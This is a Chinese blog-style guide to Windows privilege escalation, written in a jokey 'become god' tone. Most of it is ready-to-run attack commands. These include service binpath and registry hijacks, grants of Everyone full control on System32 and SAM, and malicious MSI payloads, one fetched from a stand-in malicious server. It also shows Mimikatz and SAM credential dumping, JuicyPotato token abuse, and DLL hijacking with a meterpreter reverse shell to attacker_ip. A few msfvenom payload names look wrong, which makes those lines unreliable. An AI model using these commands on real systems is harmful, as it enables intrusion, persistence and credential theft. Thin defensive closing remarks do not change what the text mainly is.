【万字长文】深入解析：Windows 提权技术全攻略，从零基础到精通，收藏这篇就够了！

移动开发 2025-04-09 23:19:38 阅读次数: 0

前言：权限？不存在的！

各位靓仔靓女们，行走在网络安全江湖，谁还没点儿“搞事情”的小心思？想不想把 Windows 系统玩弄于股掌之间，体验一把“我即是上帝”的快感？今天，就让咱来聊聊提权那些事儿，带你从菜鸟一路升级到“暗夜王者”！准备好了吗？发车啦！

1. 提权秘籍之葵花宝典：Windows 提权常用命令速查

工欲善其事，必先利其器。想玩转 Windows 提权，不掌握一些基本的命令怎么行？下面这份“葵花宝典”，助你快速了解系统信息，为后续操作打下坚实基础。记住，熟练运用这些命令，能让你在提权路上事半功倍！

命令	描述
systeminfo	打印系统信息（你的电脑啥配置，一览无遗）
whoami	获取当前用户名（知道自己是谁很重要！）
whoami /priv	列出当前帐户权限（看看自己都有哪些“特权”）
ipconfig	网络配置信息（网络诊断小能手）
ipconfig /displaydns	显示 DNS 缓存（缓存里藏着不少秘密哦）
route print	打印路由表（网络世界的“地图”）
arp -a	打印 ARP 表（IP 地址和 MAC 地址的对应关系）
hostname	获取主机名（你的电脑在网络上的“身份证”）
net user	列出用户（看看都有哪些“居民”）
net localgroup	列出所有组（了解“社区”构成）
net view \127.0.0.1	列出打开到当前计算机的会话（谁在访问你的电脑？）
net session	列出其他机器打开的会话（你的电脑访问了谁？）
netsh firewall show config	显示防火墙配置（你的“防火墙”是否坚固？）
DRIVERQUERY	列出已安装的驱动（驱动程序大点兵）
tasklist /svc	列出服务任务（服务进程一览）
net start	列出启动的服务（正在运行的服务有哪些？）
dir /s foo	在目录中搜索包含指定字符的项目（快速查找文件）
sc query	列出所有服务（服务总览）
sc qc ServiceName	找到指定服务的路径（服务的“老巢”在哪里？）
shutdown /r /t 0	立即重启（重启大法好！）
type file.txt	打印文件内容（快速查看文本文件）
icacls "C:Example"	列出权限（查看文件或目录的访问权限）
wmic qfe get Caption,Description,HotFixID,InstalledOn	列出已安装的补丁（你的系统安全吗？）
(New-Object System.Net.WebClient).DownloadFile("http://host/file","C:LocalPath")	利用 PowerShell 远程下载文件到本地（远程搬运工）
accesschk.exe -qwsu "Group"	修改对象权限（小心使用，权限狗带！）

这些命令就像是提权路上的“导航仪”，指引你一步步走向“人生巅峰”。当然，光有“导航仪”还不够，还得知道怎么开车，下面咱们就来聊聊提权的各种“姿势”。

2. 本地权限提升：漏洞利用，一击致命！

Windows 系统并非完美无缺，总有一些“小瑕疵”等待我们去发现。利用这些“小瑕疵”，我们可以实现本地权限提升，直接从普通用户变身“超级管理员”！

这里给大家推荐几个“挖矿”的好地方：

GitHub 上的 Windows 内核漏洞利用：各种大佬分享的“挖矿”成果，拿来就能用！
Exploit-DB 本地漏洞利用：全球最大的漏洞库，总有一款适合你！
Pentest Lab Windows 内核漏洞利用：实战演练，提升技能！

友情提示： 挖矿有风险，操作需谨慎！建议在虚拟机里折腾，避免把自己的电脑搞崩了。另外，记得及时给系统打补丁，堵住那些已经被公开的“矿脉”。

3. 服务配置：看似不起眼，实则暗藏杀机！

Windows 服务就像是系统的“神经中枢”，一旦配置出现问题，就可能被我们利用，实现权限提升。下面就来扒一扒那些常见的服务配置错误：

3.1 服务路径没引号：一颗定时炸弹！

如果系统管理员在配置 Windows 服务时，忘记给可执行文件路径加上引号，那就等着被“爆菊”吧！

举个栗子：

C:\Program Files\Vulnerable Service\Sub Directory\service.exe

如果没有引号，系统可能会误以为 C:\Program.exe 才是要执行的文件。

检测方法：

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

这条命令可以帮你快速找出那些“裸奔”的服务。

3.2 不安全的服务权限：谁都可以“动手动脚”！

如果服务权限配置不当，允许普通用户修改服务路径，那就意味着我们可以为所欲为了！

检测方法：

accesschk.exe -uwcqv "user" *

这条命令可以查看当前用户对各服务的权限。

sc qc "Service"

这条命令可以查看服务的详细配置。

利用方法：

sc config "Vulnerable" binpath="C:\malicious.exe"

修改服务路径，指向我们的恶意程序。

sc stop "Vulnerable"

停止服务。

sc start "Vulnerable"

启动服务，执行恶意代码。

3.3 可执行文件替换：李代桃僵，瞒天过海！

如果服务的可执行文件路径指向一个普通用户可写的目录，那就意味着我们可以狸猫换太子，把合法的程序替换成我们的恶意程序！

举个栗子：

icacls "C:\Program Files\VulnerableService" /grant Everyone:F

这条命令授予了所有用户对该目录的完全控制权。

3.4 注册表 ImagePath：改头换面，瞒天过海！

服务的可执行文件路径信息存储在注册表中，我们可以直接修改注册表，改变服务的启动路径。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VulnerableService" /v ImagePath /t REG_SZ /d "C:\malicious.exe" /f

这条命令修改了注册表中的 ImagePath，指向我们的恶意程序。

3.5 服务恢复选项：失败了？再来一次！

Windows 服务具有恢复选项，允许管理员在服务失败时配置执行的操作。我们可以修改这些选项，让服务在失败时执行我们的恶意代码。

举个栗子：

sc failure "VulnerableService" actions= restart/60000/run/60000

sc failureflag "VulnerableService" 1

sc config "VulnerableService" binpath= "C:\malicious.exe"

3.6 服务的启动类型：自动挡，你值得拥有！

如果某个服务被配置为手动启动，我们可以把它改成自动启动，让它在系统启动时自动执行我们的恶意代码。

举个栗子：

sc config "VulnerableService" start= auto

sc start "VulnerableService"

3.7 服务的依赖项：一荣俱荣，一损俱损！

我们可以利用服务之间的依赖关系，创建一个恶意服务，让它在依赖服务启动时自动启动。

举个栗子：

sc config "DependentService" depend= "VulnerableService"

sc create "VulnerableService" binpath= "C:\malicious.exe"

sc start "DependentService"

总结： 服务配置错误是提权的常见入口，安全人员应该定期检查服务配置，确保服务的安全性。

4. Windows 注册表：系统的“大脑”，也是漏洞的温床！

Windows 注册表存储了系统和应用程序的配置信息，就像是系统的“大脑”。但是，如果注册表配置不当，也可能成为攻击者的突破口。

4.1 自启动项：开机启动，先人一步！

Windows 启动时会自动运行某些注册表项中的程序。我们可以添加或修改这些项，让我们的恶意代码在系统启动时自动执行。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Malicious" /t REG_SZ /d "C:\malicious.exe" /f

4.2 服务配置中的 ImagePath：老套路，新玩法！

和前面提到的服务配置错误类似，我们可以直接修改注册表中的 ImagePath，改变服务的启动路径，执行我们的恶意代码。

4.3 AlwaysInstallElevated：MSI 文件的“免死金牌”！

AlwaysInstallElevated 是一种允许非管理员用户以 SYSTEM 权限运行 MSI 文件的设置。如果这个设置被启用，那就意味着我们可以直接执行恶意 MSI 文件，获取 SYSTEM 权限。

检测方法：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

利用方法：

msiexec /i malicious.msi

4.4 注册表键权限：谁都可以“指手画脚”！

如果某些注册表键配置了不安全的权限，允许低权限用户修改或删除这些键，我们就可以利用这一点来更改系统配置或植入恶意代码。

举个栗子：

icacls "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VulnerableService" /grant Everyone:F

4.5 安全描述符定义语言（SDDL）：权限控制的“密码”！

注册表项的安全描述符定义语言（SDDL）字符串定义了谁可以访问该项。我们可以修改 SDDL 字符串，获得对某些注册表项的完全控制权。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VulnerableService" /t REG_SZ /v "Security" /d "D:(A;;GA;;;WD)" /f

4.6 环境变量劫持：偷梁换柱，瞒天过海！

Windows 系统中的某些环境变量值存储在注册表中，我们可以通过修改这些值来劫持系统行为。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "Path" /t REG_EXPAND_SZ /d "C:\malicious;%" /f

4.7 注册表钩子：埋下“地雷”，坐收渔利！

我们可以在注册表中添加钩子，让我们的恶意代码在某些注册表项被访问时自动执行。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\target.exe" /v "Debugger" /t REG_SZ /d "C:\malicious.exe" /f

4.8 AppInit_DLLs 注入：釜底抽薪，控制全局！

通过修改 AppInit_DLLs 注册表项，我们可以将 DLL 注入到所有进程中，从而获得系统控制权。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\malicious.dll" /f

4.9 启动与恢复设置：崩溃了？也不放过你！

我们可以修改系统的启动与恢复设置，让我们的恶意代码在系统崩溃时自动执行。

举个栗子：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d "0" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "DumpFile" /t REG_EXPAND_SZ /d "C:\malicious.dmp" /f

总结： 注册表是系统的核心配置数据库，安全人员应该加强对注册表的监控和管理，及时发现和修复潜在的漏洞。

5. 不安全的文件系统权限：打开“后门”，任你进出！

不安全的文件系统权限是攻击者常用的提权手段之一。如果文件系统权限配置不当，就可能被我们利用，轻松实现权限提升。

5.1 可写的系统目录：随意涂鸦，污染系统！

如果某些系统目录被错误配置为对所有用户可写，我们就可以在这些目录中放置恶意文件，让它们在系统启动或用户执行相关程序时自动运行。

举个栗子：

icacls "C:\Windows\System32" /grant Everyone:F

5.2 可写的程序文件：李代桃僵，瞒天过海！

和前面提到的服务配置错误类似，如果某些程序文件被配置为对所有用户可写，我们就可以替换这些程序文件，让用户在执行程序时运行我们的恶意代码。

举个栗子：

icacls "C:\Program Files (x86)\VulnerableProgram" /grant Everyone:F

5.3 可写的计划任务：定时炸弹，威力无穷！

计划任务可以被配置为定期执行某些操作。我们可以创建或修改计划任务，让它们执行我们的恶意代码。

举个栗子：

schtasks /create /tn "MaliciousTask" /tr "C:\malicious.exe" /sc daily /st 12:00

5.4 可写的启动项：开机启动，先人一步！

和前面提到的注册表自启动项类似，如果某些启动项路径对所有用户可写，我们就可以在这些启动项路径中放置恶意文件，让它们在系统启动时自动运行。

举个栗子：

icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /grant Everyone:F

5.5 可写的服务二进制文件：狸猫换太子，防不胜防！

和前面提到的服务配置错误类似，如果 Windows 服务的二进制文件路径指向一个对非管理员用户可写的目录，我们就可以替换这些二进制文件，让服务在启动时运行我们的恶意代码。

举个栗子：

icacls "C:\Program Files\VulnerableService" /grant Everyone:F

5.6 系统备份文件：宝藏，还是陷阱？

一些系统备份文件可能包含敏感信息或具有不安全的文件权限。我们可以利用这些文件进行提权或信息窃取。

举个栗子：

icacls "C:\Windows\System32\config\SAM" /grant Everyone:F

5.7 可写的日志文件：掩人耳目，暗度陈仓！

如果某些日志文件被配置为对所有用户可写，我们可以利用这些日志文件来隐藏恶意活动或执行代码注入。

举个栗子：

icacls "C:\Program Files\VulnerableApp\logs" /grant Everyone:F

5.8 可写的环境变量目录：暗箱操作，控制全局！

如果环境变量目录被错误配置为对所有用户可写，我们可以修改这些目录中的文件，让系统或应用程序在启动时执行我们的恶意代码。

举个栗子：

icacls "C:\Users\Public" /grant Everyone:F

总结： 文件系统权限是系统安全的重要组成部分，安全人员应该加强对文件系统权限的配置和管理，及时发现和修复潜在的漏洞。

6. AlwaysInstallElevated：MSI 文件的“尚方宝剑”！

还记得前面提到的 AlwaysInstallElevated 吗？它允许非管理员用户以 SYSTEM 权限运行 Microsoft Windows 安装程序包（.MSI 文件）。如果这个设置被启用，那就意味着我们可以直接执行恶意 MSI 文件，获取 SYSTEM 权限。

6.1 检查 AlwaysInstallElevated 设置：先看看有没有“尚方宝剑”！

首先，我们需要检查系统中是否启用了 AlwaysInstallElevated 设置。可以通过查询以下注册表项来完成：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

如果返回的值为 1，表示该设置已启用。

6.2 创建并执行恶意 MSI 文件：手握“尚方宝剑”，为所欲为！

如果 AlwaysInstallElevated 设置启用，攻击者可以创建一个恶意 MSI 文件，并以 SYSTEM 权限执行。以下是一个创建恶意 MSI 文件的示例：

msfvenom -p windows/exec CMD=calc.exe -f msi -o malicious.msi

然后，通过以下命令执行恶意 MSI 文件：

msiexec /i malicious.msi

6.3 利用 msiexec 命令下载并执行恶意文件：远程“尚方宝剑”，隔空取物！

攻击者还可以利用 msiexec 命令下载并执行恶意文件。以下是一个示例：

msiexec /i http://malicious.server/malicious.msi

6.4 创建一个具有管理员权限的用户：空手套白狼，变身“管理员”！

通过恶意 MSI 文件，攻击者可以创建一个具有管理员权限的新用户。以下是创建恶意 MSI 文件的步骤：

msfvenom -p windows/adduser USER=hacker PASS=Password123 -f msi -o adduser.msi

执行 MSI 文件创建新用户：

msiexec /i adduser.msi

6.5 提取敏感信息：顺手牵羊，满载而归！

攻击者可以创建一个 MSI 文件，用于提取系统中的敏感信息，如密码哈希或注册表键值。以下是一个示例：

msfvenom -p windows/gather/hashdump -f msi -o hashdump.msi

执行 MSI 文件提取密码哈希：

msiexec /i hashdump.msi

6.6 运行 PowerShell 脚本：指哪打哪，灵活自如！

攻击者可以利用 MSI 文件运行复杂的 PowerShell 脚本，以执行多步骤的攻击。以下是创建一个运行 PowerShell 脚本的恶意 MSI 文件：

msfvenom -p windows/powershell_exec -f msi -o ps_script.msi CMD="powershell -ExecutionPolicy Bypass -File C:\malicious.ps1"

执行 MSI 文件运行 PowerShell 脚本：

msiexec /i ps_script.msi

总结： AlwaysInstallElevated 漏洞是提权的捷径，安全人员应确保在系统中禁用此设置，以防范潜在的攻击。

7. 凭证窃取：偷梁换柱，登录“人生巅峰”！

凭证窃取是攻击者常用的手段之一，通过获取系统中的用户凭证，攻击者可以进一步提升权限或横向移动到其他系统。

7.1 使用 Mimikatz 获取密码哈希：神器在手，天下我有！

Mimikatz 是一个强大的工具，可以从内存中提取明文密码、哈希、PIN 码和 Kerberos 票证。

示例：

# 启用 SeDebugPrivilege
privilege::debug

# 提取当前会话的所有凭证
sekurlsa::logonpasswords

7.2 从 SAM 文件中提取密码哈希：挖坟掘墓，获取“遗产”！

SAM 文件（Security Account Manager）中存储了本地用户的密码哈希。攻击者可以利用工具从该文件中提取哈希值。

示例：

# 导出 SAM 文件和 SYSTEM 文件
reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system

# 使用工具提取哈希
samdump2 C:\sam C:\system

7.3 利用 Windows Credential Manager：顺手牵羊，不费吹灰之力！

Windows Credential Manager 存储了用户的凭证，包括用户名和密码。攻击者可以使用工具读取这些凭证。

示例：

# 使用 CredDump 提取凭证
python cred_dump.py

7.4 利用组策略首选项（GPP）密码：捡漏，捡到宝了！

组策略首选项（GPP）可能包含明文密码，存储在 SYSVOL 共享中的 XML 文件中。攻击者可以读取这些文件并解密密码。

示例：

# 搜索含有 cpassword 的 XML 文件
dir \\<domain>\SYSVOL\<domain>\Policies\ /s /b | findstr cpassword

# 解密 GPP 密码
gpp-decrypt <encrypted_password>

7.5 从注册表中提取凭证：大海捞针，总有收获！

某些应用程序和服务会将凭证存储在注册表中。攻击者可以使用注册表查询命令提取这些凭证。

示例：

# 查询注册表中的凭证
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

7.6 综合利用示例：组合拳，威力更强！

综合利用多种凭证窃取技术，攻击者可以在短时间内获取大量的凭证。例如，攻击者可以先使用 Mimikatz 提取当前登录用户的凭证，再从 SAM 文件中提取本地用户的密码哈希，最后利用 GPP 和注册表中的信息，获取域管理员的凭证。

总结： 凭证是系统的“钥匙”，安全人员应加强对系统凭证的保护，包括定期清理内存中的明文密码，限制对 SAM 文件和注册表的访问权限，以及避免在组策略中存储明文密码。

8. 令牌权限利用：借鸡生蛋，狐假虎威！

令牌权限利用（Token Privileges Exploitation）是指滥用 Windows 系统中的令牌权限，以提升权限或执行特权操作。

8.1 SeDebugPrivilege：调试神器，为所欲为！

SeDebugPrivilege 允许用户调试和调整系统中的任何进程。这通常用于注入恶意代码或劫持高权限进程。

示例：

# 启用 SeDebugPrivilege
whoami /priv

# 利用 SeDebugPrivilege 附加到高权限进程并注入代码
mimikatz.exe "privilege::debug" "token::elevate" "exit"

8.2 SeImpersonatePrivilege 和 SeAssignPrimaryTokenPrivilege：移花接木，瞒天过海！

这些权限允许用户模仿或分配新的主令牌，这些权限在某些服务和应用程序中非常常见。

示例：

# 利用 JuicyPotato 提升权限
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t * -c {F2E606B6-2631-43A8-9D99-2D5B86F82DE4}

8.3 SeBackupPrivilege 和 SeRestorePrivilege：备份恢复，暗度陈仓！

这些权限允许用户备份和恢复文件，即使这些文件是系统文件或其他用户的文件。这可以用来读取或写入敏感文件。

示例：

# 使用 SeBackupPrivilege 读取敏感文件
privilege::debug
privilege::backup
token::elevate
lsadump::sam

8.4 SeTcbPrivilege（Trust Computer Base）：终极权限，掌控一切！

SeTcbPrivilege 允许用户直接与系统交互以执行任何操作，通常只有本地系统帐户才有此权限。

示例：

# 通过 SeTcbPrivilege 提升权限
mimikatz.exe "privilege::tcb" "token::elevate" "exit"

8.5 SeLoadDriverPrivilege：驱动人生，掌控内核！

SeLoadDriverPrivilege 允许用户加载和卸载设备驱动程序。攻击者可以利用这一权限加载恶意驱动程序，从而在内核级别执行代码。

示例：

# 使用 SeLoadDriverPrivilege 加载恶意驱动程序
sc create MaliciousDriver binPath= "C:\path\to\malicious.sys" type= kernel
sc start MaliciousDriver

8.6 综合利用示例：组合出击，所向披靡！

综合利用多种令牌权限可以达到更复杂和深远的攻击效果。例如，攻击者可以利用 SeImpersonatePrivilege 获取高权限令牌，再利用 SeDebugPrivilege 调试系统进程，最后利用 SeLoadDriverPrivilege 加载恶意驱动程序，达到完全控制系统的目的。

总结： 令牌权限是系统安全的关键，安全人员应特别注意用户权限配置和令牌权限管理，以防范潜在的攻击。

9. DLL 劫持：移花接木，借刀杀人！

DLL 劫持（DLL Hijacking）是指当应用程序在加载 DLL 时，如果未指定完全路径或使用不安全的路径搜索顺序，攻击者可以将恶意 DLL 注入应用程序的执行流程，从而获得执行权限。

9.1 利用程序搜索顺序劫持 DLL：狸猫换太子，防不胜防！

当应用程序加载 DLL 时，会按照预定义的搜索顺序查找 DLL 文件。攻击者可以在高优先级路径中放置恶意 DLL 文件，从而劫持应用程序。

示例：

# 创建恶意 DLL 文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f dll -o evil.dll

# 将恶意 DLL 文件放置在应用程序目录中
copy evil.dll "C:\Program Files\VulnerableApp\"

9.2 劫持系统路径中的 DLL：污染系统，殃及池鱼！

攻击者可以在系统路径中放置恶意 DLL 文件，以劫持常用应用程序或服务。

示例：

# 将恶意 DLL 文件放置在系统路径中
copy evil.dll "C:\Windows\System32\"

9.3 劫持特定服务的 DLL：控制服务，掌控全局！

某些服务在启动时会加载特定的 DLL 文件，攻击者可以替换这些 DLL 文件，从而在服务启动时执行恶意代码。

示例：

# 停止目标服务
sc stop TargetService

# 替换服务的 DLL 文件
copy evil.dll "C:\Program Files\TargetService\service.dll"

# 启动目标服务
sc start TargetService

9.4 利用注册表中的 DLL 劫持：修改配置，暗度陈仓！

注册表中的某些键值会指定 DLL 文件路径，攻击者可以修改这些路径，指向恶意 DLL 文件。

示例：

# 修改注册表键值
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\evil.dll" /f

9.5 利用加载库函数劫持 DLL：精准打击，各个击破！

开发人员使用 LoadLibrary 函数加载 DLL 文件时，如果未指定完全路径，攻击者可以利用这一点，放置恶意 DLL 文件。

示例：

# 创建恶意 DLL 文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f dll -o evil.dll

# 将恶意 DLL 文件放置在应用程序工作目录中
copy evil.dll "C:\Path\To\VulnerableApp\"